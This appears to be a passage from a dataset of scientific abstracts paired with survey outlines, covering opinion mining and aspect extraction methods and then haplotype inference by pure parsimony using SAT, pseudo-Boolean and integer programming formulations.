Aspect Extraction paper_content: This paper makes a focused contribution to supervised aspect extraction. It shows that if the system has performed aspect extraction from many past domains and retained their results as knowledge, Conditional Random Fields (CRF) can leverage this knowledge in a lifelong learning manner to extract in a new domain markedly better than the traditional CRF without using this prior knowledge. The key innovation is that even after CRF training, the model can still improve its extraction with experiences in its applications. --- paper_title: Structure-Aware Review Mining and Summarization paper_content: In this paper, we focus on object feature based review summarization. Different from most of previous work with linguistic rules or statistical methods, we formulate the review mining task as a joint structure tagging problem. We propose a new machine learning framework based on Conditional Random Fields (CRFs). It can employ rich features to jointly extract positive opinions, negative opinions and object features for review sentences. The linguistic structure can be naturally integrated into model representation. Besides linear-chain structure, we also investigate conjunction structure and syntactic tree structure in this framework. Through extensive experiments on movie review and product review data sets, we show that structure-aware models outperform many state-of-the-art approaches to review mining. --- paper_title: Extracting Opinion Targets in a Single and Cross-Domain Setting with Conditional Random Fields paper_content: In this paper, we focus on the opinion target extraction as part of the opinion mining task. We model the problem as an information extraction task, which we address based on Conditional Random Fields (CRF). As a baseline we employ the supervised algorithm by Zhuang et al. (2006), which represents the state-of-the-art on the employed data. We evaluate the algorithms comprehensively on datasets from four different domains annotated with individual opinion target instances on a sentence level. Furthermore, we investigate the performance of our CRF-based approach and the baseline in a single- and cross-domain opinion target extraction setting. Our CRF-based approach improves the performance by 0.077, 0.126, 0.071 and 0.178 regarding F-Measure in the single-domain extraction in the four domains. In the cross-domain setting our approach improves the performance by 0.409, 0.242, 0.294 and 0.343 regarding F-Measure over the baseline. --- paper_title: Aspect Term Extraction Based on MFE-CRF paper_content: This paper is focused on aspect term extraction in aspect-based sentiment analysis (ABSA), which is one of the hot spots in natural language processing (NLP). This paper proposes MFE-CRF that introduces Multi-Feature Embedding (MFE) clustering based on the Conditional Random Field (CRF) model to improve the effect of aspect term extraction in ABSA. First, Multi-Feature Embedding (MFE) is proposed to improve the text representation and capture more semantic information from text. Then the authors use kmeans++ algorithm to obtain MFE and word clustering to enrich the position features of CRF. Finally, the clustering classes of MFE and word embedding are set as the additional position features to train the model of CRF for aspect term extraction. The experiments on SemEval datasets validate the effectiveness of this model. The results of different models indicate that MFE-CRF can greatly improve the Recall rate of CRF model. Additionally, the Precision rate also is increased obviously when the semantics of text is complex. --- paper_title: Fine-grained Opinion Mining with Recurrent Neural Networks and Word Embeddings paper_content: The tasks in fine-grained opinion mining can be regarded as either a token-level sequence labeling problem or as a semantic compositional task. We propose a general class of discriminative models based on recurrent neural networks (RNNs) and word embeddings that can be successfully applied to such tasks without any taskspecific feature engineering effort. Our experimental results on the task of opinion target identification show that RNNs, without using any hand-crafted features, outperform feature-rich CRF-based models. Our framework is flexible, allows us to incorporate other linguistic features, and achieves results that rival the top performing systems in SemEval-2014. --- paper_title: Multi-task Coupled Attentions for Category-specific Aspect and Opinion Terms Co-extraction paper_content: In aspect-based sentiment analysis, most existing methods either focus on aspect/opinion terms extraction or aspect terms categorization. However, each task by itself only provides partial information to end users. To generate more detailed and structured opinion analysis, we propose a finer-grained problem, which we call category-specific aspect and opinion terms extraction. This problem involves the identification of aspect and opinion terms within each sentence, as well as the categorization of the identified terms. To this end, we propose an end-to-end multi-task attention model, where each task corresponds to aspect/opinion terms extraction for a specific category. Our model benefits from exploring the commonalities and relationships among different tasks to address the data sparsity issue. We demonstrate its state-of-the-art performance on three benchmark datasets. --- paper_title: Aspect Term Extraction with History Attention and Selective Transformation paper_content: Aspect Term Extraction (ATE), a key sub-task in Aspect-Based Sentiment Analysis, aims to extract explicit aspect expressions from online user reviews. We present a new framework for tackling ATE. It can exploit two useful clues, namely opinion summary and aspect detection history. Opinion summary is distilled from the whole input sentence, conditioned on each current token for aspect prediction, and thus the tailor-made summary can help aspect prediction on this token. Another clue is the information of aspect detection history, and it is distilled from the previous aspect predictions so as to leverage the coordinate structure and tagging schema constraints to upgrade the aspect prediction. Experimental results over four benchmark datasets clearly demonstrate that our framework can outperform all state-of-the-art methods. --- paper_title: Global Inference for Aspect and Opinion Terms Co-Extraction Based on Multi-Task Neural Networks paper_content: Extracting aspect terms and opinion terms are two fundamental tasks in opinion mining. The recent success of deep learning has inspired various neural network architectures, which have been shown to achieve highly competitive performance in these two tasks. However, most existing methods fail to explicitly consider the syntactic relations among aspect terms and opinion terms, which may lead to the inconsistencies between the model predictions and the syntactic constraints. To this end, we first apply a multi-task learning framework to implicitly capture the relations between the two tasks, and then propose a global inference method by explicitly modelling several syntactic constraints among aspect term extraction and opinion term extraction to uncover their intra-task and inter-task relationship, which seeks an optimal solution over the neural predictions for both tasks. Extensive evaluations on three benchmark datasets demonstrate that our global inference approach is able to bring consistent improvements over several base models in different scenarios. --- paper_title: Dependency-Tree Based Convolutional Neural Networks for Aspect Term Extraction paper_content: Aspect term extraction is one of the fundamental subtasks in aspect-based sentiment analysis. Previous work has shown that sentences’ dependency information is critical and has been widely used for opinion mining. With recent success of deep learning in natural language processing (NLP), recurrent neural network (RNN) has been proposed for aspect term extraction and shows the superiority over feature-rich CRFs based models. However, because RNN is a sequential model, it can not effectively capture tree-based dependency information of sentences thus limiting its practicability. In order to effectively exploit sentences’ dependency information and leverage the effectiveness of deep learning, we propose a novel dependency-tree based convolutional stacked neural network (DTBCSNN) for aspect term extraction, in which tree-based convolution is introduced over sentences’ dependency parse trees to capture syntactic features. Our model is an end-to-end deep learning based model and it does not need any human-crafted features. Furthermore, our model is flexible to incorporate extra linguistic features to further boost the model performance. To substantiate, results from experiments on SemEval2014 Task4 datasets (reviews on restaurant and laptop domain) show that our model achieves outstanding performance and outperforms the RNN and CRF baselines. --- paper_title: Distributed Representations of Words and Phrases and their Compositionality paper_content: The recently introduced continuous Skip-gram model is an efficient method for learning high-quality distributed vector representations that capture a large number of precise syntactic and semantic word relationships. In this paper we present several extensions that improve both the quality of the vectors and the training speed. By subsampling of the frequent words we obtain significant speedup and also learn more regular word representations. We also describe a simple alternative to the hierarchical softmax called negative sampling. ::: ::: An inherent limitation of word representations is their indifference to word order and their inability to represent idiomatic phrases. For example, the meanings of "Canada" and "Air" cannot be easily combined to obtain "Air Canada". Motivated by this example, we present a simple method for finding phrases in text, and show that learning good vector representations for millions of phrases is possible. --- paper_title: Double Embeddings and CNN-based Sequence Labeling for Aspect Extraction paper_content: One key task of fine-grained sentiment analysis of product reviews is to extract product aspects or features that users have expressed opinions on. This paper focuses on supervised aspect extraction using deep learning. Unlike other highly sophisticated supervised deep learning models, this paper proposes a novel and yet simple CNN model employing two types of pre-trained embeddings for aspect extraction: general-purpose embeddings and domain-specific embeddings. Without using any additional supervision, this model achieves surprisingly good results, outperforming state-of-the-art sophisticated existing methods. To our knowledge, this paper is the first to report such double embeddings based CNN model for aspect extraction and achieve very good results. --- paper_title: Emotions Evoked by Common Words and Phrases: Using Mechanical Turk to Create an Emotion Lexicon paper_content: Even though considerable attention has been given to semantic orientation of words and the creation of large polarity lexicons, research in emotion analysis has had to rely on limited and small emotion lexicons. In this paper, we show how we create a high-quality, moderate-sized emotion lexicon using Mechanical Turk. In addition to questions about emotions evoked by terms, we show how the inclusion of a word choice question can discourage malicious data entry, help identify instances where the annotator may not be familiar with the target term (allowing us to reject such annotations), and help obtain annotations at sense level (rather than at word level). We perform an extensive analysis of the annotations to better understand the distribution of emotions evoked by terms of different parts of speech. We identify which emotions tend to be evoked simultaneously by the same term and show that certain emotions indeed go hand in hand. --- paper_title: Mining and summarizing customer reviews paper_content: Merchants selling products on the Web often ask their customers to review the products that they have purchased and the associated services. As e-commerce is becoming more and more popular, the number of customer reviews that a product receives grows rapidly. For a popular product, the number of reviews can be in hundreds or even thousands. This makes it difficult for a potential customer to read them to make an informed decision on whether to purchase the product. It also makes it difficult for the manufacturer of the product to keep track and to manage customer opinions. For the manufacturer, there are additional difficulties because many merchant sites may sell the same product and the manufacturer normally produces many kinds of products. In this research, we aim to mine and to summarize all the customer reviews of a product. This summarization task is different from traditional text summarization because we only mine the features of the product on which the customers have expressed their opinions and whether the opinions are positive or negative. We do not summarize the reviews by selecting a subset or rewrite some of the original sentences from the reviews to capture the main points as in the classic text summarization. Our task is performed in three steps: (1) mining product features that have been commented on by customers; (2) identifying opinion sentences in each review and deciding whether each opinion sentence is positive or negative; (3) summarizing the results. This paper proposes several novel techniques to perform these tasks. Our experimental results using reviews of a number of products sold online demonstrate the effectiveness of the techniques. --- paper_title: SentiWordNet 3.0: An Enhanced Lexical Resource for Sentiment Analysis and Opinion Mining paper_content: In this work we present SENTIWORDNET 3.0, a lexical resource explicitly devised for supporting sentiment classification and opinion mining applications. SENTIWORDNET 3.0 is an improved version of SENTIWORDNET 1.0, a lexical resource publicly available for research purposes, now currently licensed to more than 300 research groups and used in a variety of research projects worldwide. Both SENTIWORDNET 1.0 and 3.0 are the result of automatically annotating all WORDNET synsets according to their degrees of positivity, negativity, and neutrality. SENTIWORDNET 1.0 and 3.0 differ (a) in the versions of WORDNET which they annotate (WORDNET 2.0 and 3.0, respectively), (b) in the algorithm used for automatically annotating WORDNET, which now includes (additionally to the previous semi-supervised learning step) a random-walk step for refining the scores. We here discuss SENTIWORDNET 3.0, especially focussing on the improvements concerning aspect (b) that it embodies with respect to version 1.0. We also report the results of evaluating SENTIWORDNET 3.0 against a fragment of WORDNET 3.0 manually annotated for positivity, negativity, and neutrality; these results indicate accuracy improvements of about 20% with respect to SENTIWORDNET 1.0. --- paper_title: Hierarchical viewpoint discovery from tweets using Bayesian modelling paper_content: Abstract When users express their stances towards a topic in social media, they might elaborate their viewpoints or reasoning. Oftentimes, viewpoints expressed by different users exhibit a hierarchical structure. Therefore, detecting this kind of hierarchical viewpoints offers a better insight to understand the public opinion. In this paper, we propose a novel Bayesian model for hierarchical viewpoint discovery from tweets. Driven by the motivation that a viewpoint expressed in a tweet can be regarded as a path from the root to a leaf of a hierarchical viewpoint tree, the assignment of the relevant viewpoint topics is assumed to follow two nested Chinese restaurant processes. Moreover, opinions in text are often expressed in un-semantically decomposable multi-terms or phrases, such as ‘economic recession’. Hence, a hierarchical Pitman–Yor process is employed as a prior for modelling the generation of phrases with arbitrary length. Experimental results on two Twitter corpora demonstrate the effectiveness of the proposed Bayesian model for hierarchical viewpoint discovery. --- paper_title: Hierarchical latent tree analysis for topic detection paper_content: In the LDA approach to topic detection, a topic is determined by identifying the words that are used with high frequency when writing about the topic. However, high frequency words in one topic may be also used with high frequency in other topics. Thus they may not be the best words to characterize the topic. In this paper, we propose a new method for topic detection, where a topic is determined by identifying words that appear with high frequency in the topic and low frequency in other topics. We model patterns of word co- occurrence and co-occurrences of those patterns using a hierarchy of discrete latent variables. The states of the latent variables represent clusters of documents and they are interpreted as topics. The words that best distinguish a cluster from other clusters are selected to characterize the topic. Empirical results show that the new method yields topics with clearer thematic characterizations than the alternative approaches. --- paper_title: Latent Tree Analysis paper_content: Latent tree analysis seeks to model the correlations among a set of random variables using a tree of latent variables. It was proposed as an improvement to latent class analysis --- a method widely used in social sciences and medicine to identify homogeneous subgroups in a population. It provides new and fruitful perspectives on a number of machine learning areas, including cluster analysis, topic detection, and deep probabilistic modeling. This paper gives an overview of the research on latent tree analysis and various ways it is used in practice. --- paper_title: Hierarchical Topic Models and the Nested Chinese Restaurant Process paper_content: We address the problem of learning topic hierarchies from data. The model selection problem in this domain is daunting—which of the large collection of possible trees to use? We take a Bayesian approach, generating an appropriate prior via a distribution on partitions that we refer to as the nested Chinese restaurant process. This nonparametric prior allows arbitrarily large branching factors and readily accommodates growing data collections. We build a hierarchical topic model by combining this prior with a likelihood that is based on a hierarchical variant of latent Dirichlet allocation. We illustrate our approach on simulated data and with an application to the modeling of NIPS abstracts. --- paper_title: Incorporating self-organizing map with text mining techniques for text hierarchy generation paper_content: Graphical abstractThis work proposes a scheme to improve the self-organizing map algorithm. This is the overall flowchart of the proposed algorithm. The key ingredients include:1.A novel topic identification scheme.2.Lateral expansion using novel topic incompatibility measure.3.Hierarchical expansion scheme using novel cluster size and topic size criteria.Display Omitted HighlightsIncorporation of topic identification into SOM learning could be beneficial to text categorization task.Both lateral and hierarchical expansion during SOM learning were achieved according to criteria based on identified topics.The produced text hierarchies outperformed contemporary approaches in quality and performance on text categorization. Self-organizing maps (SOM) have been applied on numerous data clustering and visualization tasks and received much attention on their success. One major shortage of classical SOM learning algorithm is the necessity of predefined map topology. Furthermore, hierarchical relationships among data are also difficult to be found. Several approaches have been devised to conquer these deficiencies. In this work, we propose a novel SOM learning algorithm which incorporates several text mining techniques in expanding the map both laterally and hierarchically. On training a set of text documents, the proposed algorithm will first cluster them using classical SOM algorithm. We then identify the topics of each cluster. These topics are then used to evaluate the criteria on expanding the map. The major characteristic of the proposed approach is to combine the learning process with text mining process and makes it suitable for automatic organization of text documents. We applied the algorithm on the Reuters-21578 dataset in text clustering and categorization tasks. Our method outperforms two comparing models in hierarchy quality according to users' evaluation. It also receives better F1-scores than two other models in text categorization task. --- paper_title: Jointly Modeling Aspects and Opinions with a MaxEnt-LDA Hybrid paper_content: Discovering and summarizing opinions from online reviews is an important and challenging task. A commonly-adopted framework generates structured review summaries with aspects and opinions. Recently topic models have been used to identify meaningful review aspects, but existing topic models do not identify aspect-specific opinion words. In this paper, we propose a MaxEnt-LDA hybrid model to jointly discover both aspects and aspect-specific opinion words. We show that with a relatively small amount of training data, our model can effectively identify aspect and opinion words simultaneously. We also demonstrate the domain adaptability of our model. --- paper_title: BERT: Pre-training of Deep Bidirectional Transformers for Language Understanding paper_content: We introduce a new language representation model called BERT, which stands for Bidirectional Encoder Representations from Transformers. Unlike recent language representation models, BERT is designed to pre-train deep bidirectional representations from unlabeled text by jointly conditioning on both left and right context in all layers. As a result, the pre-trained BERT model can be fine-tuned with just one additional output layer to create state-of-the-art models for a wide range of tasks, such as question answering and language inference, without substantial task-specific architecture modifications. ::: BERT is conceptually simple and empirically powerful. It obtains new state-of-the-art results on eleven natural language processing tasks, including pushing the GLUE score to 80.5% (7.7% point absolute improvement), MultiNLI accuracy to 86.7% (4.6% absolute improvement), SQuAD v1.1 question answering Test F1 to 93.2 (1.5 point absolute improvement) and SQuAD v2.0 Test F1 to 83.1 (5.1 point absolute improvement). --- paper_title: Jointly Modeling Aspects and Opinions with a MaxEnt-LDA Hybrid paper_content: Discovering and summarizing opinions from online reviews is an important and challenging task. A commonly-adopted framework generates structured review summaries with aspects and opinions. Recently topic models have been used to identify meaningful review aspects, but existing topic models do not identify aspect-specific opinion words. In this paper, we propose a MaxEnt-LDA hybrid model to jointly discover both aspects and aspect-specific opinion words. We show that with a relatively small amount of training data, our model can effectively identify aspect and opinion words simultaneously. We also demonstrate the domain adaptability of our model. --- paper_title: Deep contextualized word representations paper_content: We introduce a new type of deep contextualized word representation that models both (1) complex characteristics of word use (e.g., syntax and semantics), and (2) how these uses vary across linguistic contexts (i.e., to model polysemy). Our word vectors are learned functions of the internal states of a deep bidirectional language model (biLM), which is pre-trained on a large text corpus. We show that these representations can be easily added to existing models and significantly improve the state of the art across six challenging NLP problems, including question answering, textual entailment and sentiment analysis. We also present an analysis showing that exposing the deep internals of the pre-trained network is crucial, allowing downstream models to mix different types of semi-supervision signals. --- paper_title: Double Embeddings and CNN-based Sequence Labeling for Aspect Extraction paper_content: One key task of fine-grained sentiment analysis of product reviews is to extract product aspects or features that users have expressed opinions on. This paper focuses on supervised aspect extraction using deep learning. Unlike other highly sophisticated supervised deep learning models, this paper proposes a novel and yet simple CNN model employing two types of pre-trained embeddings for aspect extraction: general-purpose embeddings and domain-specific embeddings. Without using any additional supervision, this model achieves surprisingly good results, outperforming state-of-the-art sophisticated existing methods. To our knowledge, this paper is the first to report such double embeddings based CNN model for aspect extraction and achieve very good results. ---
Title: A Survey on Opinion Mining: From Stance to Product Aspect Section 1: INTRODUCTION Description 1: Briefly introduce the growth of user-generated text containing opinions, the quintuple used in opinion mining, and the importance of automating opinion discovery from online texts. Section 2: EVALUATION METRICS AND AVAILABLE DATASETS Description 2: Describe different evaluation metrics used for opinion mining system performance and summarize widely used datasets and lexicons for stance detection and product aspect mining. Section 3: STANCE DETECTION Description 3: Provide a comprehensive summary of stance detection methodologies, including problem settings and various approaches such as supervised learning, weakly supervised learning, and collective models for stance detection in online debate forums and social media. Section 4: PRODUCT ASPECT MINING Description 4: Present an in-depth survey on product aspect mining methodologies, including corpus-level aspect extraction, corpus-level aspect and opinion mining, and document/sentence level aspect and opinion mining. Section 5: CHALLENGES AND POSSIBLE SOLUTIONS Description 5: Discuss significant challenges in opinion mining, such as the lack of stance lexicons and large-scale annotated corpus for stance detection, and the need for structured aspect mining and incorporating external knowledge. Section 6: CONCLUSION Description 6: Summarize the survey findings, observed trends, and future directions, emphasizing the transition from traditional methods to knowledge-based approaches and neural-based models.
Haplotype Inference with Boolean Constraint Solving: An Overview
12
--- paper_title: Efficient haplotype inference with pseudo-Boolean optimization paper_content: Haplotype inference from genotype data is a key computational problem in bioinformatics, since retrieving directly haplotype information from DNA samples is not feasible using existing technology. One of the methods for solving this problem uses the pure parsimony criterion, an approach known as Haplotype Inference by Pure Parsimony (HIPP). Initial work in this area was based on a number of different Integer Linear Programming (ILP) models and branch and bound algorithms. Recent work has shown that the utilization of a Boolean Satisfiability (SAT) formulation and state of the art SAT solvers represents the most efficient approach for solving the HIPP problem. ::: ::: Motivated by the promising results obtained using SAT techniques, this paper investigates the utilization of modern Pseudo-Boolean Optimization (PBO) algorithms for solving the HIPP problem. The paper starts by applying PBO to existing ILP models. The results are promising, and motivate the development of a new PBO model (RPoly) for the HIPP problem, which has a compact representation and eliminates key symmetries. Experimental results indicate that RPoly outperforms the SAT-based approach on most problem instances, being, in general, significantly more efficient. --- paper_title: A New Integer Programming Formulation for the Pure Parsimony Problem in Haplotype Analysis paper_content: We present a new integer programming formulation for the haplotype inference by pure parsimony (HIPP) problem. Unlike a previous approach to this problem [2], we create an integer program whose size is polynomial in the size of the input. This IP is substantially smaller for moderate-sized instances of the HIPP problem. We also show several additional constraints, based on the input, that can be added to the IP to aid in finding a solution, and show how to find which of these constraints is active for a given instance in efficient time. We present experimental results that show our IP has comparable success to the formulation of Gusfield [2] on moderate-sized problems, though it is is much slower. However, our formulation can sometimes solve substantially larger problems than are practical with Gusfield’s formulation. --- paper_title: Efficient haplotype inference with boolean satisfiability paper_content: Mutation in DNA is the principal cause for differences among human beings, and Single Nucleotide Polymorphisms (SNPs) are the most common mutations. Hence, a fundamental task is to complete a map of haplotypes (which identify SNPs) in the human population. Associated with this effort, a key computational problem is the inference of haplotype data from genotype data, since in practice genotype data rather than haplotype data is usually obtained. Different haplotype inference approaches have been proposed, including the utilization of statistical methods and the utilization of the pure parsimony criterion. The problem of haplotype inference by pure parsimony (HIPP) is interesting not only because of its application to haplotype inference, but also because it is a challenging NP-hard problem, being APX-hard. Recent work has shown that a SAT-based approach is the most efficient approach for the problem of haplotype inference by pure parsimony (HIPP), being several orders of magnitude faster than existing integer linear programming and branch and bound solutions. This paper provides a detailed description of SHIPs, a SAT-based approach for the HIPP problem, and presents comprehensive experimental results comparing SHIPs with all other exact approaches for the HIPP problem. These results confirm that SHIPs is currently the most effective approach for the HIPP problem. --- paper_title: Integer programming approaches to haplotype inference by pure parsimony paper_content: In 2003, Gusfield introduced the Haplotype Inference by Pure Parsimony (HIPP) problem and presented an integer program (IP) that quickly solved many simulated instances of the problem [1]. Although it solved well on small instances, Gusfield's IP can be of exponential size in the worst case. Several authors [2], [3] have presented polynomial-sized IPs for the problem. In this paper, we further the work on IP approaches to HIPP. We extend the existing polynomial-sized IPs by introducing several classes of valid cuts for the IP. We also present a new polynomial-sized IP formulation that is a hybrid between two existing IP formulations and inherits many of the strengths of both. Many problems that are too complex for the exponential-sized formulations can still be solved in our new formulation in a reasonable amount of time. We provide a detailed empirical comparison of these IP formulations on both simulated and real genotype sequences. Our formulation can also be extended in a variety of ways to allow errors in the input or model the structure of the population under consideration. --- paper_title: Haplotype inference by pure Parsimony paper_content: The next high-priority phase of human genomics will involve the development and use of a full Haplotype Map of the human genome [7]. A critical, perhaps dominating, problem in all such efforts is the inference of large-scale SNP-haplotypes from raw genotype SNP data. This is called the Haplotype Inference (HI) problem. Abstractly, input to the HI problem is a set of n strings over a ternary alphabet. A solution is a set of at most 2n strings over the binary alphabet, so that each input string can be "generated" by some pair of the binary strings in the solution. For greatest biological fidelity, a solution should be consistent with, or evaluated by, properties derived from an appropriate genetic model. ::: ::: A natural model, that has been suggested repeatedly is called here the Pure Parsimony model, where the goal is to find a smallest set of binary strings that can generate the n input strings. The problem of finding such a smallest set is called the Pure Parsimony Problem. Unfortunately, the Pure Parsimony problem is NP-hard, and no paper has previously shown how an optimal Pure-parsimony solution can be computed efficiently for problem instances of the size of current biological interest. In this paper, we show how to formulate the Pure-parsimony problem as an integer linear program; we explain how to improve the practicality of the integer programming formulation; and we present the results of extensive experimentation we have done to show the time and memory practicality of the method, and to compare its accuracy against solutions found by the widely used general haplotyping program PHASE. We also formulate and experiment with variations of the Pure-Parsimony criteria, that allow greater practicality. The results are that the Pure Parsimony problem can be solved efficiently in practice for a wide range of problem instances of current interest in biology. Both the time needed for a solution, and the accuracy of the solution, depend on the level of recombination in the input strings. The speed of the solution improves with increasing recombination, but the accuracy of the solution decreases with increasing recombination. --- paper_title: Haplotype inference by pure Parsimony paper_content: The next high-priority phase of human genomics will involve the development and use of a full Haplotype Map of the human genome [7]. A critical, perhaps dominating, problem in all such efforts is the inference of large-scale SNP-haplotypes from raw genotype SNP data. This is called the Haplotype Inference (HI) problem. Abstractly, input to the HI problem is a set of n strings over a ternary alphabet. A solution is a set of at most 2n strings over the binary alphabet, so that each input string can be "generated" by some pair of the binary strings in the solution. For greatest biological fidelity, a solution should be consistent with, or evaluated by, properties derived from an appropriate genetic model. ::: ::: A natural model, that has been suggested repeatedly is called here the Pure Parsimony model, where the goal is to find a smallest set of binary strings that can generate the n input strings. The problem of finding such a smallest set is called the Pure Parsimony Problem. Unfortunately, the Pure Parsimony problem is NP-hard, and no paper has previously shown how an optimal Pure-parsimony solution can be computed efficiently for problem instances of the size of current biological interest. In this paper, we show how to formulate the Pure-parsimony problem as an integer linear program; we explain how to improve the practicality of the integer programming formulation; and we present the results of extensive experimentation we have done to show the time and memory practicality of the method, and to compare its accuracy against solutions found by the widely used general haplotyping program PHASE. We also formulate and experiment with variations of the Pure-Parsimony criteria, that allow greater practicality. The results are that the Pure Parsimony problem can be solved efficiently in practice for a wide range of problem instances of current interest in biology. Both the time needed for a solution, and the accuracy of the solution, depend on the level of recombination in the input strings. The speed of the solution improves with increasing recombination, but the accuracy of the solution decreases with increasing recombination. --- paper_title: Integer programming approaches to haplotype inference by pure parsimony paper_content: In 2003, Gusfield introduced the Haplotype Inference by Pure Parsimony (HIPP) problem and presented an integer program (IP) that quickly solved many simulated instances of the problem [1]. Although it solved well on small instances, Gusfield's IP can be of exponential size in the worst case. Several authors [2], [3] have presented polynomial-sized IPs for the problem. In this paper, we further the work on IP approaches to HIPP. We extend the existing polynomial-sized IPs by introducing several classes of valid cuts for the IP. We also present a new polynomial-sized IP formulation that is a hybrid between two existing IP formulations and inherits many of the strengths of both. Many problems that are too complex for the exponential-sized formulations can still be solved in our new formulation in a reasonable amount of time. We provide a detailed empirical comparison of these IP formulations on both simulated and real genotype sequences. Our formulation can also be extended in a variety of ways to allow errors in the input or model the structure of the population under consideration. --- paper_title: Efficient haplotype inference with boolean satisfiability paper_content: Mutation in DNA is the principal cause for differences among human beings, and Single Nucleotide Polymorphisms (SNPs) are the most common mutations. Hence, a fundamental task is to complete a map of haplotypes (which identify SNPs) in the human population. Associated with this effort, a key computational problem is the inference of haplotype data from genotype data, since in practice genotype data rather than haplotype data is usually obtained. Different haplotype inference approaches have been proposed, including the utilization of statistical methods and the utilization of the pure parsimony criterion. The problem of haplotype inference by pure parsimony (HIPP) is interesting not only because of its application to haplotype inference, but also because it is a challenging NP-hard problem, being APX-hard. Recent work has shown that a SAT-based approach is the most efficient approach for the problem of haplotype inference by pure parsimony (HIPP), being several orders of magnitude faster than existing integer linear programming and branch and bound solutions. This paper provides a detailed description of SHIPs, a SAT-based approach for the HIPP problem, and presents comprehensive experimental results comparing SHIPs with all other exact approaches for the HIPP problem. These results confirm that SHIPs is currently the most effective approach for the HIPP problem. --- paper_title: Efficient and Tight Upper Bounds for Haplotype Inference by Pure Parsimony using Delayed Haplotype Selection paper_content: Haplotype inference from genotype data is a key step towards a better understanding of the role played by genetic variations on inherited diseases. One of the most promising approaches uses the pure parsimony criterion. This approach is called Haplotype Inference by Pure Parsimony (HIPP) and is NP-hard as it aims at minimising the number of haplotypes required to explain a given set of genotypes. The HIPP problem is often solved using constraint satisfaction techniques, for which the upper bound on the number of required haplotypes is a key issue. Another very well-known approach is Clark's method, which resolves genotypes by greedily selecting an explaining pair of haplotypes. In this work, we combine the basic idea of Clark's method with a more sophisticated method for the selection of explaining haplotypes, in order to explicitly introduce a bias towards parsimonious explanations. This new algorithm can be used either to obtain an approximated solution to the HIPP problem or to obtain an upper bound on the size of the pure parsimony solution. This upper bound can then used to efficiently encode the problem as a constraint satisfaction problem. The experimental evaluation, conducted using a large set of real and artificially generated examples, shows that the new method is much more effective than Clark's method at obtaining parsimonious solutions, while keeping the advantages of simplicity and speed of Clark's method. --- paper_title: Inference of haplotypes from PCR-amplified samples of diploid populations. paper_content: Direct sequencing of genomic DNA from diploid individuals leads to ambiguities on sequencing gels whenever there is more than one mismatching site in the sequences of the two orthologous copies of a gene. While these ambiguities cannot be resolved from a single sample without resorting to other experimental methods (such as cloning in the traditional way), population samples may be useful for inferring haplotypes. For each individual in the sample that is homozygous for the amplified sequence, there are no ambiguities in the identification of the allele’s sequence. The sequences of other alleles can be inferred by taking the remaining sequence after “subtracting off’ the sequencing ladder of each known site. Details of the algorithm for extracting allelic sequences from such data are presented here, along with some population-genetic considerations that influence the likelihood for success of the method. The algorithm also applies to the problem of inferring haplotype frequencies of closely linked restriction-site polymorphisms. --- paper_title: A New Integer Programming Formulation for the Pure Parsimony Problem in Haplotype Analysis paper_content: We present a new integer programming formulation for the haplotype inference by pure parsimony (HIPP) problem. Unlike a previous approach to this problem [2], we create an integer program whose size is polynomial in the size of the input. This IP is substantially smaller for moderate-sized instances of the HIPP problem. We also show several additional constraints, based on the input, that can be added to the IP to aid in finding a solution, and show how to find which of these constraints is active for a given instance in efficient time. We present experimental results that show our IP has comparable success to the formulation of Gusfield [2] on moderate-sized problems, though it is is much slower. However, our formulation can sometimes solve substantially larger problems than are practical with Gusfield’s formulation. --- paper_title: A survey of computational methods for determining haplotypes paper_content: It is widely anticipated that the study of variation in the human genome will provide a means of predicting risk of a variety of complex diseases. Single nucleotide polymorphisms (SNPs) are the most common form of genomic variation. Haplotypes have been suggested as one means for reducing the complexity of studying SNPs. In this paper we review some of the computational approaches that have been taking for determining haplotypes and suggest new approaches. --- paper_title: Integer programming approaches to haplotype inference by pure parsimony paper_content: In 2003, Gusfield introduced the Haplotype Inference by Pure Parsimony (HIPP) problem and presented an integer program (IP) that quickly solved many simulated instances of the problem [1]. Although it solved well on small instances, Gusfield's IP can be of exponential size in the worst case. Several authors [2], [3] have presented polynomial-sized IPs for the problem. In this paper, we further the work on IP approaches to HIPP. We extend the existing polynomial-sized IPs by introducing several classes of valid cuts for the IP. We also present a new polynomial-sized IP formulation that is a hybrid between two existing IP formulations and inherits many of the strengths of both. Many problems that are too complex for the exponential-sized formulations can still be solved in our new formulation in a reasonable amount of time. We provide a detailed empirical comparison of these IP formulations on both simulated and real genotype sequences. Our formulation can also be extended in a variety of ways to allow errors in the input or model the structure of the population under consideration. --- paper_title: Haplotype inference by pure Parsimony paper_content: The next high-priority phase of human genomics will involve the development and use of a full Haplotype Map of the human genome [7]. A critical, perhaps dominating, problem in all such efforts is the inference of large-scale SNP-haplotypes from raw genotype SNP data. This is called the Haplotype Inference (HI) problem. Abstractly, input to the HI problem is a set of n strings over a ternary alphabet. A solution is a set of at most 2n strings over the binary alphabet, so that each input string can be "generated" by some pair of the binary strings in the solution. For greatest biological fidelity, a solution should be consistent with, or evaluated by, properties derived from an appropriate genetic model. ::: ::: A natural model, that has been suggested repeatedly is called here the Pure Parsimony model, where the goal is to find a smallest set of binary strings that can generate the n input strings. The problem of finding such a smallest set is called the Pure Parsimony Problem. Unfortunately, the Pure Parsimony problem is NP-hard, and no paper has previously shown how an optimal Pure-parsimony solution can be computed efficiently for problem instances of the size of current biological interest. In this paper, we show how to formulate the Pure-parsimony problem as an integer linear program; we explain how to improve the practicality of the integer programming formulation; and we present the results of extensive experimentation we have done to show the time and memory practicality of the method, and to compare its accuracy against solutions found by the widely used general haplotyping program PHASE. We also formulate and experiment with variations of the Pure-Parsimony criteria, that allow greater practicality. The results are that the Pure Parsimony problem can be solved efficiently in practice for a wide range of problem instances of current interest in biology. Both the time needed for a solution, and the accuracy of the solution, depend on the level of recombination in the input strings. The speed of the solution improves with increasing recombination, but the accuracy of the solution decreases with increasing recombination. --- paper_title: Haplotype inference by pure Parsimony paper_content: The next high-priority phase of human genomics will involve the development and use of a full Haplotype Map of the human genome [7]. A critical, perhaps dominating, problem in all such efforts is the inference of large-scale SNP-haplotypes from raw genotype SNP data. This is called the Haplotype Inference (HI) problem. Abstractly, input to the HI problem is a set of n strings over a ternary alphabet. A solution is a set of at most 2n strings over the binary alphabet, so that each input string can be "generated" by some pair of the binary strings in the solution. For greatest biological fidelity, a solution should be consistent with, or evaluated by, properties derived from an appropriate genetic model. ::: ::: A natural model, that has been suggested repeatedly is called here the Pure Parsimony model, where the goal is to find a smallest set of binary strings that can generate the n input strings. The problem of finding such a smallest set is called the Pure Parsimony Problem. Unfortunately, the Pure Parsimony problem is NP-hard, and no paper has previously shown how an optimal Pure-parsimony solution can be computed efficiently for problem instances 